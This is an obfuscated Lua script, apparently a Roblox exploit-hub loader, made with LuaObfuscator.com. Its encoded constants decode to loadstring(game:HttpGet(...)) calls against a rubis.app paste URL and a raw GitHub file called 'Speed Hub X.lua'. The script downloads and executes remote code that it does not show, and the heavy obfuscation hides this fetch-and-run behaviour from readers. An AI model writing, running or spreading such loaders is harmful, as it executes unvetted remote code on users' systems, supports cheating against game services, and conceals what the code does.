--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v104=0;local v105;while true do if (v104==1) then return v105;end if (v104==0) then v105=v5(v82,v19);v19=nil;v104=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(((21 -16) -3)^(v32-(928 -(214 + 713)))))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (1638 -(1523 + 114)))) ;return v83-(v83%(1 + 0)) ;else local v84=(2 -0)^(v32-(2 -1)) ;return (((v31%(v84 + v84))>=v84) and (620 -(555 + 64))) or (931 -(857 + (191 -(32 + 85)))) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + ((354 -(87 + 263)) -(182 -(67 + 113))) ;v35=1 -0 ;end if (v35==(1 -0)) then return (v37 * 256) + v36 ;end end end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12338840 + 3230645 + 1207731)) + (v41 * (260471 -194935)) + (v40 * (1208 -(802 + 150))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;v38=1;end end end local function v24() local v43=v23();local v44=v23();local v45=998 -(915 + 82) ;local v46=(v20(v44,1,20) * ((5 -3)^(19 + 13))) + v43 ;local v47=v20(v44,27 -6 ,1218 -(1069 + 118) );local v48=((v20(v44,72 -40 )==(1 -0)) and  -(1 + (438 -(145 + 293)))) or (1 -0) ;if (v47==(0 + (430 -(44 + 386)))) then if (v46==0) then return v48 * (791 -(368 + 423)) ;else v47=(1489 -(998 + 488)) -2 ;v45=0;end elseif (v47==(2065 -(10 + 8))) then return ((v46==((0 + 0) -0)) and (v48 * ((443 -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/(2^(91 -39)))) ;end local function v25(v49) local v50;if  not v49 then local v85=0 + (0 -0) ;while true do if (v85==(772 -(201 + 571))) then v49=v23();if (v49==(1138 -(116 + 1022))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v65=1, #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 1000 -(451 + 549) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do if (v52~=(1 + 1)) then else for v92= #"\\",v23() do local v93=(function() return 0 -0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v93~=1) then else while true do if ((0 -0)~=v94) then else v95=(function() return v21();end)();if (v20(v95, #",", #"[")~=0) then else local v123=(function() return 202 -(14 + 188) ;end)();local v124=(function() return;end)();local v125=(function() return;end)();local v126=(function() return;end)();while true do if (v123~=(678 -(534 + 141))) then else if (v20(v125, #"xxx", #"asd")== #"}") then v126[ #".dev"]=(function() return v58[v126[ #".com"]];end)();end v53[v92]=(function() return v126;end)();break;end if (v123==(2 -0)) then if (v20(v125, #"\\", #",")== #"|") then v126[1 + 1 ]=(function() return v58[v126[2]];end)();end if (v20(v125,2 + 0 ,2 + 0 )~= #"\\") then else v126[ #"91("]=(function() return v58[v126[ #"asd"]];end)();end v123=(function() return 3;end)();end if (v123~=(0 -0)) then else local v182=(function() return 0 -0 ;end)();while true do if ((1 + 0)==v182) then v123=(function() return 1;end)();break;end if (v182~=0) then else v124=(function() return v20(v95,2, #"xnx");end)();v125=(function() return v20(v95, #".dev",16 -10 );end)();v182=(function() return 561 -(306 + 254) ;end)();end end end if ((1 + 0)==v123) then local v183=(function() return 0 + 0 ;end)();while true do if (v183==(0 + 0)) then v126=(function() return {v22(),v22(),nil,nil};end)();if (v124==(396 -(115 + 281))) then local v203=(function() return 0 -0 ;end)();while true do if (v203==(1467 -(899 + 568))) then v126[ #"asd"]=(function() return v22();end)();v126[ #"0836"]=(function() return v22();end)();break;end end elseif (v124== #"~") then v126[ #"xxx"]=(function() return v23();end)();elseif (v124==(2 + 0)) then v126[ #"-19"]=(function() return v23() -((4 -2)^16) ;end)();elseif (v124~= #"91(") then else local v208=(function() return 603 -(268 + 335) ;end)();local v209=(function() return;end)();while true do if ((0 -0)==v208) then v209=(function() return 0 -0 ;end)();while true do if (v209~=(867 -(550 + 317))) then else v126[ #"gha"]=(function() return v23() -((2 -0)^(22 -6)) ;end)();v126[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v183=(function() return 2 -1 ;end)();end if (v183~=(286 -(134 + 151))) then else v123=(function() return 2;end)();break;end end end end end break;end end break;end if (v93==(1665 -(970 + 695))) then local v106=(function() return 811 -(569 + 242) ;end)();while true do if (v106==0) then v94=(function() return 0 -0 ;end)();v95=(function() return nil;end)();v106=(function() return 1991 -(582 + 1408) ;end)();end if (v106==1) then v93=(function() return 2 -1 ;end)();break;end end end end end for v96= #"~",v23() do v54[v96-#"!" ]=(function() return v28();end)();end return v56;end if ( #">"==v52) then local v88=(function() return 0 + 0 ;end)();local v89=(function() return;end)();while true do if (v88~=0) then else v89=(function() return 1024 -(706 + 318) ;end)();while true do if (v89==(1252 -(721 + 530))) then for v108= #"|",v57 do local v109=(function() return 0 -0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==(1271 -(945 + 326))) then local v127=(function() return 0 -0 ;end)();local v128=(function() return;end)();while true do if (v127~=(0 -0)) then else v128=(function() return 0 + 0 ;end)();while true do if (v128==(3 -2)) then v109=(function() return 701 -(271 + 429) ;end)();break;end if ((1824 -(1195 + 629))~=v128) then else v110=(function() return 0 -0 ;end)();v111=(function() return nil;end)();v128=(function() return 242 -(187 + 54) ;end)();end end break;end end end if (v109==(1501 -(1408 + 92))) then v112=(function() return nil;end)();while true do if (v110~= #"~") then else if (v111== #"[") then v112=(function() return v21()~=(780 -(162 + 618)) ;end)();elseif (v111==(2 + 0)) then v112=(function() return v24();end)();elseif (v111== #"xxx") then v112=(function() return v25();end)();end v58[v108]=(function() return v112;end)();break;end if (v110~=(0 + 0)) then else local v190=(function() return 0;end)();local v191=(function() return;end)();while true do if (v190~=0) then else v191=(function() return 0;end)();while true do if (v191==(1172 -(418 + 753))) then v110=(function() return  #"[";end)();break;end if (v191==(0 + 0)) then v111=(function() return v21();end)();v112=(function() return nil;end)();v191=(function() return 1;end)();end end break;end end end end break;end end end v56[ #"19("]=(function() return v21();end)();v89=(function() return 1 + 1 ;end)();end if (v89~=(2 + 0)) then else v52=(function() return 1 + 1 ;end)();break;end if (v89==0) then v57=(function() return v23();end)();v58=(function() return {};end)();v89=(function() return 1;end)();end end break;end end end if (v52~=0) then else local v90=(function() return 529 -(406 + 123) ;end)();local v91=(function() return;end)();while true do if (v90~=0) then else v91=(function() return 0 -0 ;end)();while true do if (v91==1) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v91=(function() return 1 + 1 ;end)();end if (v91~=(1 + 1)) then else v52=(function() return  #"}";end)();break;end if (v91~=(1322 -(1249 + 73))) then else v53=(function() return {};end)();v54=(function() return {};end)();v91=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end end end local function v29(v59,v60,v61) local v62=v59[1 + 0 ];local v63=v59[1147 -(466 + 679) ];local v64=v59[2 + 1 ];return function(...) local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=2 -1 ;local v72= -(2 -(98 -(11 + 86)));local v73={};local v74={...};local v75=v12("#",...) -(1 + (0 -0)) ;local v76={};local v77={};for v86=1661 -(1477 + 184) ,v75 do if ((1616>=788) and (v86>=v69)) then v73[v86-v69 ]=v74[v86 + (1 -0) ];else v77[v86]=v74[v86 + (286 -(175 + 110)) + 0 ];end end local v78=(v75-v69) + (2 -1) ;local v79;local v80;while true do local v87=0 -0 ;while true do if (v87==((2163 -1306) -(564 + 292))) then if (v80<=(119 -(4 + 110))) then if (v80<=(5 -(14 -11))) then if ((1854<=3379) and (v80<=(304 -(244 + 60)))) then do return;end elseif (v80>(585 -(57 + 527))) then local v129=v79[1429 -(41 + 1386) ];local v130=v77[v79[106 -(17 + 86) ]];v77[v129 + 1 + 0 ]=v130;v77[v129]=v130[v79[4]];elseif ((4549==4549) and (v77[v79[3 -1 ]]==v79[4])) then v71=v71 + (2 -1) ;else v71=v79[169 -(122 + 44) ];end elseif (v80<=((2924 -(503 + 1293)) -(936 + 189))) then local v113=0 + 0 ;local v114;local v115;local v116;local v117;while true do if ((1 -(0 -0))==v113) then v72=(v116 + v114) -(3 -(2 + 0)) ;v117=0 + 0 ;v113=1 + 1 ;end if ((0 -0)==v113) then v114=v79[4 -2 ];v115,v116=v70(v77[v114](v13(v77,v114 + (66 -(30 + 35)) ,v79[1095 -(975 + 117) ])));v113=1 + 0 ;end if (v113==(1259 -(1043 + 214))) then for v185=v114,v72 do local v186=0 -0 ;while true do if ((v186==(0 -0)) or (3022>=3024)) then v117=v117 + ((2274 -(810 + 251)) -(323 + 889)) ;v77[v185]=v115[v117];break;end end end break;end end elseif ((4820>2198) and (v80==(10 -6))) then v71=v79[(405 + 178) -(361 + 219) ];else v77[v79[322 -(53 + 267) ]]=v79[1 + 1 + 1 ];end elseif ((v80<=(421 -(14 + 1 + 398))) or (1061>=4891)) then if ((1364<=4473) and (v80<=6)) then local v118=0 + 0 ;local v119;local v120;local v121;local v122;while true do if (v118==(983 -(18 + 964))) then v71=v71 + (2 -1) ;v79=v67[v71];v122=v79[1229 -(322 + 905) ];v120,v121=v70(v77[v122](v13(v77,v122 + (612 -(602 + 9)) ,v79[11 -8 ])));v118=2 + 0 ;end if ((874 -(826 + 46))==v118) then v72=(v121 + v122) -(1 + 0) ;v119=850 -(20 + 830) ;for v187=v122,v72 do local v188=0 + 0 ;while true do if (v188==((659 -(43 + 490)) -(116 + 10))) then v119=v119 + 1 + 0 ;v77[v187]=v120[v119];break;end end end v71=v71 + (1899 -(260 + 1638)) ;v118=741 -((1275 -(711 + 22)) + 196) ;end if (v118==((30 -22) -4)) then v79=v67[v71];v77[v79[6 -4 ]]();v71=v71 + 1 + 0 ;v79=v67[v71];v118=5 + 0 ;end if ((2 + 1)==v118) then v79=v67[v71];v122=v79[2];v77[v122]=v77[v122](v13(v77,v122 + (2 -1) ,v72));v71=v71 + (1206 -((1761 -(240 + 619)) + 303)) ;v118=8 -4 ;end if (v118==(0 + 0 + 0)) then v119=nil;v120,v121=nil;v122=nil;v77[v79[4 -2 ]]=v79[1693 -(1121 + 569) ]~=(0 -0) ;v118=1552 -(1126 + 425) ;end if (v118==5) then v71=v79[1466 -((2232 -828) + 59) ];break;end end elseif ((v80==(19 -12)) or (3595<=3)) then local v137=405 -(118 + 19 + 268) ;local v138;while true do if (v137==((1744 -(1344 + 400)) -0)) then v138=v79[1123 -((523 -(255 + 150)) + 1003) ];v77[v138]=v77[v138](v13(v77,v138 + ((2 + 0) -1) ,v72));break;end end else v77[v79[4 -2 ]]=v61[v79[5 -2 ]];end elseif (v80<=((208 + 179) -((606 -464) + 235))) then if (v80==((129 -89) -31)) then v77[v79[1 + 1 ]]();else local v141;local v142,v143;local v144;local v145;v77[v79[979 -(553 + 424) ]]=v61[v79[5 -2 ]];v71=v71 + ((1741 -(404 + 1335)) -1) ;v79=v67[v71];v145=v79[2];v144=v77[v79[3 + 0 ]];v77[v145 + 1 + 0 ]=v144;v77[v145]=v144[v79[3 + 1 ]];v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[2 + 0 ]]=v79[4 -(407 -(183 + 223)) ];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[165 -(92 + 71) ]]=v79[7 -(4 -0) ]~=(0 -0) ;v71=v71 + 1 + 0 ;v79=v67[v71];v145=v79[9 -7 ];v142,v143=v70(v77[v145](v13(v77,v145 + (754 -(239 + 514)) ,v79[2 + 1 ])));v72=(v143 + v145) -(1330 -(797 + 353 + 179)) ;v141=0 + 0 + 0 ;for v177=v145,v72 do local v178=0 + 0 ;while true do if (v178==(0 -0)) then v141=v141 + (1203 -(373 + 829)) ;v77[v177]=v142[v141];break;end end end v71=v71 + 1 ;v79=v67[v71];v145=v79[733 -((813 -(10 + 327)) + 255) ];v77[v145]=v77[v145](v13(v77,v145 + (1131 -(369 + 761)) ,v72));v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[2 -0 ]]();v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[2]]=v61[v79[(4 + 1) -2 ]];v71=v71 + ((577 -(118 + 220)) -(64 + 174)) ;v79=v67[v71];v77[v79[1 + 1 ]]=v61[v79[1 + 2 ]];v71=v71 + 1 ;v79=v67[v71];v145=v79[(451 -(108 + 341)) -0 ];v144=v77[v79[339 -(65 + 79 + 192) ]];v77[v145 + (217 -(42 + 174)) ]=v144;v77[v145]=v144[v79[4 + 0 ]];end elseif (v80==(10 + 1)) then v77[v79[1 + 1 ]]=v79[1507 -(363 + 1141) ]~=0 ;else for v179=v79[1582 -(1183 + 397) ],v79[8 -5 ] do v77[v179]=nil;end end v71=v71 + (1887 -(927 + 959)) ;break;end if (v87==(0 + 0)) then v79=v67[v71];v80=v79[733 -(16 + 716) ];v87=1 -(0 -0) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F4D7241485A4357456159436A4B7434692F726177034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F41686D6164562Q392F53702Q65642D4875622D582F6D61696E2F53702Q6564253230487562253230582E6C7561001C3Q0012053Q00014Q000C000100013Q0026013Q000200010001002Q043Q00020001001205000100013Q0026010001000500010001002Q043Q00050001001208000200023Q00120A000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q000300030004001205000500064Q0006000600016Q000300066Q00023Q00024Q00020001000100044Q001B0001002Q043Q00050001002Q043Q001B0001002Q043Q000200016Q00017Q00",v9(),...);
